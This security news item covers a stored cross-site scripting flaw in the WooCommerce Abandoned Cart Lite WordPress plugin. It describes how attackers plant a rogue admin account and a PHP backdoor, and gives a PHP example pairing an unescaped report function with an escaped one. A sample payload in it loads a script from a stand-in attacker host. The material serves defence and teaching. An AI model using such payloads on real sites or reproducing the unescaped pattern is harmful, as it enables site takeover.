Delaware, USA – March 13, 2019 – Extending WordPress with plugins widens its default functionality, but it also brings a number of risks. The WooCommerce Abandoned Cart Lite plugin gives a site administrator a report of the products most frequently bought on the site, together with details of the carts shoppers abandoned. However, Wordfence strongly recommends updating the plugin to its latest version, which now includes built-in protection against cross-site scripting (XSS).
Running a vulnerable version of the plugin leaves a site wide open to exploitation of a stored cross-site scripting vulnerability. The attacker inserts malicious code directly into one of the contact-information fields; when the field is rendered, that code loads a malicious script from a specially crafted link. The script then creates a new administrator account with a hardcoded username and password. It also checks the site for any disabled plugin and injects a PHP backdoor into that plugin's code, so that the attacker keeps access if the rogue admin account is discovered.
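The root cause of such a stored XSS is customer-supplied data echoed into an admin report without escaping. The following is an illustrative example added by the editor; it is not the plugin's own code. The function names, the `$carts` array and the sample row are assumptions, and the `esc_html` fallback is a stand-in so the snippet runs outside WordPress (inside WordPress the real function is used):

```php
<?php
// Editor-added illustration of the vulnerable and hardened output patterns.
// Assumed: $carts is a list of abandoned-cart rows read from the database,
// each carrying a customer-supplied 'name' and 'email' captured at checkout.

// Stand-in for WordPress' esc_html() so this file runs stand-alone (assumption).
if ( ! function_exists( 'esc_html' ) ) {
    function esc_html( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES | ENT_HTML5, 'UTF-8' );
    }
}

// Vulnerable pattern: the stored value is concatenated into HTML as-is.
// A name such as <script src="https://attacker.example/x.js"></script> would
// execute in the browser of every administrator who opens the report.
function render_abandoned_carts_vulnerable( array $carts ) {
    $html = '<table>';
    foreach ( $carts as $cart ) {
        $html .= '<tr><td>' . $cart['name'] . '</td><td>' . $cart['email'] . '</td></tr>';
    }
    return $html . '</table>';
}

// Hardened pattern: every value is escaped at output time, so the same
// stored value is shown literally instead of being interpreted as markup.
function render_abandoned_carts_safe( array $carts ) {
    $html = '<table>';
    foreach ( $carts as $cart ) {
        $html .= '<tr><td>' . esc_html( $cart['name'] ) . '</td>'
               . '<td>' . esc_html( $cart['email'] ) . '</td></tr>';
    }
    return $html . '</table>';
}

// Constructed sample row standing in for a record an attacker left behind.
$carts = array(
    array(
        'name'  => '<script src="https://attacker.example/x.js"></script>',
        'email' => 'shopper@example.com',
    ),
);

echo "Vulnerable output:\n" . render_abandoned_carts_vulnerable( $carts ) . "\n\n";
echo "Hardened output:\n"   . render_abandoned_carts_safe( $carts ) . "\n";
```

In the hardened output the `<script>` tag appears as `&lt;script ...&gt;`, which the browser renders as text. Escaping at output is the control that matters here; sanitising on input (for example with `sanitize_text_field()` and `sanitize_email()`) is worth adding as defence in depth, but on its own it does not protect data that was stored before the fix.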
The Wordfence firewall blocks the exploit, but the researchers do not have exact figures for either the number of sites hit by the XSS payload or the number successfully compromised. The Magecart groups' attacks (1, 2) are a vivid example of this never-ending exploitation of website plugin vulnerabilities combined with hiding malicious code out of sight. You can use ArcSight with the Web Application Security Framework rule pack to reduce the risk of attacks on your publicly accessible online resources: https://my.socprime.com/en/integrations/web-application-security-framework-arcsight